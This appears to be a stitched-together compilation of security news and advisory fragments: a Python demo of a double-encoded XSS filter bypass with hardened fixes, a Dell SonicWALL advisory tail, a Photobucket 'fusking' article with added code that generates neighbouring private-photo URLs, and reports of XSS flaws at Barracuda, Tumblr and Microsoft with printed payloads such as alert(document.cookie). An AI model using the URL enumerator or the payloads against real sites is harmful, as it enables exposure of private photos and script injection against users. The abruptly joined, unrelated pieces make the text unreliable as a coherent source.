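    """Hypothetical vulnerable pipeline: the framework decodes the query string once,
    the filter runs on that, and the view decodes the value a second time before
    echoing it into the listing. The filter never sees '<' in a double-encoded payload."""
    once = unquote(raw_param)          # "%253c" -> "%3c"
    filtered = blacklist_filter(once)  # nothing to strip: still "%3c"
    twice = unquote(filtered)          # "%3c" -> "<": filter bypassed
    return f"<td>from: {twice}</td>"


def render_listing_hardened(raw_param: str) -> str:
    """Decode exactly once, then treat the value as data: `from`/`row` are paging
    offsets, so anything that is not a non-negative integer is rejected outright."""
    once = unquote(raw_param)
    if not once.isdigit():
        raise ValueError(f"from/row must be a non-negative integer, got {once!r}")
    return f"<td>from: {html.escape(once, quote=True)}</td>"


def render_text_hardened(raw_param: str) -> str:
    """Where a free-text parameter must be echoed, decode once and HTML-encode at the
    output boundary instead of trying to blacklist markup on the way in."""
    once = unquote(raw_param)
    return f"<td>from: {html.escape(once, quote=True)}</td>"


_TAG = re.compile(r"<\s*([A-Za-z][A-Za-z0-9]*)")


def injected_tags(rendered: str) -> list[str]:
    """Tag names that appear in the rendered cell besides the <td> wrapper."""
    return [t for t in _TAG.findall(rendered) if t.lower() != "td"]


if __name__ == "__main__":
    for label, raw in (("single", SINGLE_ENCODED), ("double", DOUBLE_ENCODED)):
        print(label, "naive:", injected_tags(render_listing_naive(raw)),
              "hardened:", injected_tags(render_text_hardened(raw)))
```

Run it and the single-encoded payload is neutralised by the blacklist while the double-encoded one yields an injected iframe from the naive renderer; both hardened renderers emit no foreign tags. The practical check when testing a filter like this is to compare what the filter sees with what the template finally receives: if the two differ by one decoding step, the blacklist is decorative.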
Risk:
=====
1.1
The security risk of the persistent input validation vulnerabilities is estimated as high(-).
1.2
The security risk of the client side cross site scripting vulnerabilities is estimated as low(+).
UPDATE: Patch
"Dell SonicWALL E-mail security customers: 7.3.6 patch is now available https://www.mysonicwall.com/Firmware/DownloadCenter.aspx"
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)
Hackers have managed to gain access to a number of women's private nude photos on Photobucket, then posted them in public Web forums.
An entire thread on Reddit is devoted to posting X-rated pics stolen from Photobucket, an online photo-hosting platform. Some of the women pose in underwear or completely nude, some hide their faces while others stare directly into the camera, but none intended to share the photos.
Unbelievably, another thread takes requests. Reddit users post names of girls whose private photos they want to see.
Skilled hackers are bypassing Photobucket's security settings and scouring for naked photos users wanted to keep private. They use software to retrieve the hidden snaps, a disturbing trend known as "fusking."
Photobucket users have the option of making their albums or individual photos private, but every single photo still has its own URL.
The image title is part of the URL, and even if the URL is private, the title isn’t hard to find.
For example, if a user has an image titled IMG_03 that is made public, they likely also have an IMG_04, even if it is not public. Fusking programs essentially speed up the guessing process and produce URLs for someone's hidden photos, something like: http://www.photobucket.com/image/username/IMG_04.jpg.
Photobucket says it’s aware of fusking and provides a URL scrambling service that makes photos harder to hack.
“Scrambled URLs have been an option for the past two years and will be the default for all new uploads,” Photobucket spokesman David Toner said. “The company is in the process of reminding users about the option to scramble URLs to prevent fusking.”
Toner added that the breach of privacy is “very rare” and said it has “only affected a small number of Photobucket’s users.”
Experts say the best way to avoid starring in your own X-rated Reddit show is to keep nude photos off the Internet altogether — private or not.
“Privacy settings on social media sites just can’t keep up with how fast technology is adapting,” social media attorney Ethan Wall said.
“As sites get more private, hackers and people who want to get more information will continue to get more sophisticated,” Wall added.
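The guessing step in the article is mechanical enough to show in code. This is an added example, not software from Photobucket or from any fusking tool: given one leaked public URL with a camera-style sequential name, it derives the neighbouring URLs an enumerator would request, preserving zero padding and extension, and beside it a server-side naming scheme of the kind the article calls URL scrambling, which replaces the sequential stem with a random token so there is no neighbour to derive. The example URL, the filename pattern and the token format are assumptions made for the demonstration.

```python
import re
import secrets
from urllib.parse import urlsplit, urlunsplit

# Constructed example URL in the shape the article describes; not a real Photobucket link.
PUBLIC_URL = "http://www.photobucket.com/image/username/IMG_03.jpg"

# Camera/phone-style names assumed here: a letter prefix, a separator, a short counter, an extension.
_SEQUENTIAL = re.compile(
    r"^(?P<prefix>[A-Za-z]+[_-])(?P<num>\d{1,8})(?P<ext>\.[A-Za-z0-9]+)$")


def is_guessable(filename: str) -> bool:
    """True when the name follows the sequential pattern an enumerator can walk."""
    return _SEQUENTIAL.match(filename) is not None


def neighbour_urls(url: str, before: int = 1, after: int = 3) -> list[str]:
    """What a fusking tool derives from one leaked public URL: the URLs of the
    counters just before and after it, keeping the zero padding and extension."""
    parts = urlsplit(url)
    folder, _, name = parts.path.rpartition("/")
    m = _SEQUENTIAL.match(name)
    if m is None:
        return []
    n, width = int(m["num"]), len(m["num"])
    out = []
    for k in range(n - before, n + after + 1):
        if k < 0 or k == n:
            continue
        new_name = f"{m['prefix']}{k:0{width}d}{m['ext']}"
        out.append(urlunsplit(parts._replace(path=f"{folder}/{new_name}")))
    return out


def scrambled_name(original: str) -> str:
    """Server-side mitigation of the kind the article calls URL scrambling: keep the
    extension, replace the sequential stem with a random 128-bit hex token."""
    ext = original.rsplit(".", 1)[-1] if "." in original else ""
    token = secrets.token_hex(16)
    return f"{token}.{ext}" if ext else token


def guess_space(filename: str) -> int:
    """Candidates an attacker must try for the stem alone: 10**digits for a
    sequential counter, 16**chars for a hex token produced by scrambled_name()."""
    m = _SEQUENTIAL.match(filename)
    if m:
        return 10 ** len(m["num"])
    return 16 ** len(filename.rsplit(".", 1)[0])


if __name__ == "__main__":
    print("enumerable:", neighbour_urls(PUBLIC_URL))
    hidden = scrambled_name("IMG_04.jpg")
    print("scrambled:", hidden, "neighbours:", neighbour_urls(
        "http://www.photobucket.com/image/username/" + hidden))
    print("guess space:", guess_space("IMG_04.jpg"), "vs", guess_space(hidden))
```

The point the numbers make: a two-digit counter has a hundred candidates, so "private" is only a flag the server checks if the URL itself is the secret, whereas a 32-hex-character stem cannot be walked from a sibling. Scrambling only helps uploads made after it is enabled; names already leaked stay enumerable.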
Vulnerability-Lab researchers discovered a new serious vulnerability in the Barracuda appliances, that could affect a number of companies which rely on Barracuda products.
The input filter blocks persistent input attacks with a restriction/filter exception for double quotes, <>, frames, scripts & statements. The vulnerability allows bypassing the existing input validation filter & exception handling.
“The bug is located in the processing that saves the URL path name (DB stored) with an attached file. The vulnerability allows bypassing the path URL name parse restriction, which leads to execution in a second vulnerable bound module that displays the input as an output listing,” the advisory reads.
The Account MyResource Display (example listing + input) & Upload File modules execute the earlier saved `save` path of url-path/folder, which bypasses the input validation filter & exception handling. The result is persistent execution of malicious script code outside the security appliance's application context.
“The URL path function saves the context of the input path name (parsed) as a client side request via URL. If the request gets bound with the file, which is stored (persistent) and displayed later on the overview listings, the code gets executed unauthorized outside the security application context (persistent|server-side),” the experts explain.
The researchers say that the flaw can be fixed by parsing the second input request of the “file upload” function and the path URL request.
To demonstrate their findings, the experts have published a proof-of-concept video:
Barracuda Networks was notified of the issues sometime in May, but so far it is uncertain when a patch will be made available.
A security researcher, Riyaz Ahemed Walikar, has posted evidence of a serious persistent Cross Site Scripting (XSS) vulnerability on Tumblr, the popular microblogging platform.
XSS flaws are highly common on websites these days, but most of them are non-persistent and therefore less dangerous.
"XSS can cause a lot of serious problems. An attacker can steal cookies, redirect users to fake or malicious sites, control a user's browser using automated frameworks like BeEF and download and execute exploits on the victim's computer," the researcher said in the blog post.
"Stored XSS is even more dangerous since the script is stored on the server and is executed every time a user visits an infected page."
The researcher found the vulnerability on the 'Register Application' page at http://www.tumblr.com/oauth/apps. The application was not sanitizing user input when a user created a new application. An XSS attack vector like tester "><img src='x' onerror="alert(document.cookie)"/> entered as the application name would trigger an alert box, displaying the user's cookie, in the browser of anyone viewing the page.
Tumblr was notified about the issue more than three weeks ago. They finally fixed the vulnerability today (July 14).
If you don't know what XSS is, you can read this article "Xss For Beginners".
A security researcher, Gambit, has discovered a cross site scripting vulnerability in an official Microsoft website.
He found the vulnerability last month and reported it to Microsoft.
"Well last month I was looking around on MSN.com and Microsoft.com and I found two XSS vulnerabilities, one in each domain. I reported the vulnerabilities to the Microsoft security team and secured a spot on their acknowledgments page," Gambit said in his blog.
Microsoft listed his name on the 'Security Researcher Acknowledgments for Microsoft Online Services' page.
The 'asia.perf.glbdns.microsoft.com' page is vulnerable to XSS. The researcher managed to execute XSS code in the page.
POC: "asia.perf.glbdns.microsoft.com/files/top.php?domain=<script>alert(/Gambit/)</script>"